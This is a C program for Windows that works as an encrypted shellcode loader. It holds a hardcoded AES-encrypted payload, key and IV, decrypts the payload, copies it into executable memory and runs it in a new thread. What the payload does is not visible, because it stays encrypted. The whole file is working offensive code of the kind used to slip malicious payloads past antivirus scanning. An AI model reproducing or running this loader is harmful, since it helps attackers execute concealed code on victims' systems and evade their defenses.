#include <Windows.h>
#include <stdio.h>
#include "aes.h"


int main() {
    unsigned char Encryptedbuffer[304] = {
        0xc9, 0xea, 0x08, 0x4d, 0xdd, 0x59, 0xfd, 0x0e, 0xbc, 0x57,
        0x9a, 0x02, 0x5a, 0xa1, 0x3f, 0xd7, 0xcf, 0x16, 0xcc, 0xd4,
        0x48, 0xc5, 0x65, 0x8c, 0x81, 0xd7, 0xb2, 0x76, 0xfa, 0xba,
        0x97, 0xae, 0xca, 0x0f, 0x8f, 0xea, 0xc6, 0x80, 0xfd, 0xed,
        0x16, 0x67, 0x4e, 0x7c, 0x48, 0x19, 0x0d, 0xdb, 0x7d, 0xc8,
        0xb8, 0xcc, 0x51, 0x39, 0x09, 0x50, 0x76, 0xce, 0x06, 0x3c,
        0x7d, 0x3f, 0x8b, 0x24, 0xc5, 0x07, 0xb7, 0xbc, 0x79, 0x34,
        0xfe, 0x88, 0x06, 0x9b, 0xc7, 0x75, 0x72, 0xbb, 0xf9, 0x29,
        0xba, 0xe8, 0x57, 0x06, 0x75, 0x0a, 0x8e, 0xbe, 0xa6, 0xd6,
        0x60, 0x1e, 0x9a, 0x41, 0x28, 0x29, 0x03, 0x27, 0x8d, 0x88,
        0x56, 0x49, 0x47, 0x7e, 0x96, 0x4a, 0xc3, 0x4e, 0x8a, 0x61,
        0xc5, 0xb6, 0xc1, 0x27, 0x73, 0xdf, 0x88, 0xaf, 0x7d, 0x95,
        0xba, 0xc6, 0x64, 0x6c, 0xbd, 0xbf, 0xf8, 0xe4, 0x9f, 0x5e,
        0x7f, 0x26, 0x42, 0x09, 0xd2, 0x2d, 0xb3, 0xbe, 0xf2, 0x81,
        0x27, 0xc9, 0xbe, 0x1e, 0x79, 0x92, 0x3c, 0xb1, 0x33, 0x00,
        0xf7, 0x1d, 0x0b, 0x4e, 0x65, 0x0b, 0xc8, 0x0e, 0x4d, 0x18,
        0x41, 0x58, 0xf1, 0x94, 0x09, 0xc2, 0x42, 0xd9, 0xe6, 0xe2,
        0xea, 0xb3, 0x09, 0x14, 0x63, 0x17, 0x92, 0xb2, 0x5a, 0x33,
        0xd0, 0xd0, 0x6c, 0xb4, 0x3c, 0xe0, 0xa6, 0x23, 0x4b, 0x8b,
        0x8e, 0xbb, 0x5a, 0xe0, 0x43, 0x65, 0xbb, 0x12, 0xb9, 0xb6,
        0x54, 0x09, 0x17, 0x35, 0x03, 0xcb, 0xa8, 0x10, 0xf2, 0x2a,
        0x2c, 0xdc, 0x8a, 0xb8, 0xe8, 0xd1, 0xb9, 0x83, 0xfe, 0x75,
        0x11, 0xd7, 0x9b, 0x70, 0x4e, 0x82, 0xad, 0x97, 0x19, 0x39,
        0xf6, 0x1f, 0xb5, 0x50, 0xdd, 0x0c, 0xc5, 0xfb, 0xf1, 0xa2,
        0xf2, 0xc9, 0x48, 0xfa, 0xba, 0xac, 0xf0, 0x8d, 0xc7, 0xb4,
        0x46, 0x5b, 0x82, 0x88, 0x9f, 0x5f, 0xbe, 0xe2, 0x11, 0xfa,
        0x94, 0x8d, 0x69, 0xdc, 0x53, 0x76, 0x65, 0x07, 0x65, 0x96,
        0xe4, 0x5c, 0x25, 0x13, 0x41, 0x9b, 0x8f, 0x64, 0xbe, 0x90,
        0x34, 0x51, 0x16, 0x8b, 0x0a, 0xc3, 0xe8, 0xe2, 0x9e, 0x89,
        0x58, 0x98, 0x26, 0x0d, 0xbe, 0xb2, 0xd1, 0xf2, 0xef, 0x47,
        0xd5, 0x06, 0x70
    };
	SIZE_T shellcodeSize = sizeof(Encryptedbuffer);

	unsigned char key[] = "Captain.MeeloIsTheSuperSecretKey";
	// key should be 32 bytes
	unsigned char iv[] = "\x9d\x02\x35\x3b\xa3\x4b\xec\x26\x13\x88\x58\x51\x11\x47\xa5\x98";
	// iv should be 16
	struct AES_ctx ctx;
	AES_init_ctx_iv(&ctx, key, iv);
	AES_CBC_decrypt_buffer(&ctx, Encryptedbuffer, shellcodeSize);

	//printf("[+] Decrypted buffer:\n");
	//for (int i = 0; i < shellcodeSize - 1; i++) {
	//	printf("\\x%02x", Encryptedbuffer[i]);
	//}

	LPVOID pBase = NULL;
	pBase = VirtualAllocEx(GetCurrentProcess(), NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (pBase == NULL){
		printf("[!] VirtualAllocEx failes with error : %d \n", GetLastError());
		return 0;
	}
	printf("\n[+] pBase ::: 0x%0-16p of size ::: %ld\n", (void *) pBase, shellcodeSize);
	RtlMoveMemory(pBase, Encryptedbuffer, shellcodeSize);

	printf("[+] Shellcode was Moved, press any key to run the shellcode ... \n");
	getchar();

	DWORD lpThreadId;
	CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pBase, NULL, NULL, &lpThreadId);
	Sleep(10);
	printf("[+] DONE ... \n");

}